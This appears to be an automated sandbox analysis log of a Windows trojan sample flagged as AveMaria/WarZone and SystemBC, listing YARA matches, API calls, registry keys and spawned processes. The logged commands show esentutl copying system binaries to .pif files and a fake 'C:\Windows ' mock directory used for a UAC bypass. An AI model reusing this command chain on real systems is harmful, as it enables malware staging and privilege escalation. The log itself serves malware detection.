Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@34/11@2/4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004132F4 Sleep,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 10_2_004132F4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004132F4 Sleep,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 21_2_004132F4
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F17FD2 GetDiskFreeSpaceA, 0_2_02F17FD2
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004160C3 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 10_2_004160C3
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F26DC8 CoCreateInstance, 0_2_02F26DC8
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004158F7 GetModuleFileNameW,IsUserAnAdmin,FindResourceW,LoadResource,SizeofResource,LockResource, 10_2_004158F7
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00410DF8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 10_2_00410DF8
Source: C:\Users\Public\Libraries\kwtqutrL.pif File created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Users\Public\Libraries\kwtqutrL.pif Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: qqig1mHX8U.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\qqig1mHX8U.exe File read: C:\Users\user\Desktop\qqig1mHX8U.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\qqig1mHX8U.exe "C:\Users\user\Desktop\qqig1mHX8U.exe"
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\kwtqutrL.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\qqig1mHX8U.exe /d C:\\Users\\Public\\Libraries\\Lrtuqtwk.PIF /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown Process created: C:\Users\Public\Libraries\Lrtuqtwk.PIF "C:\Users\Public\Libraries\Lrtuqtwk.PIF"
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif
Source: unknown Process created: C:\Users\Public\Libraries\Lrtuqtwk.PIF "C:\Users\Public\Libraries\Lrtuqtwk.PIF"
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\kwtqutrL.cmd" " Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\qqig1mHX8U.exe /d C:\\Users\\Public\\Libraries\\Lrtuqtwk.PIF /o Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
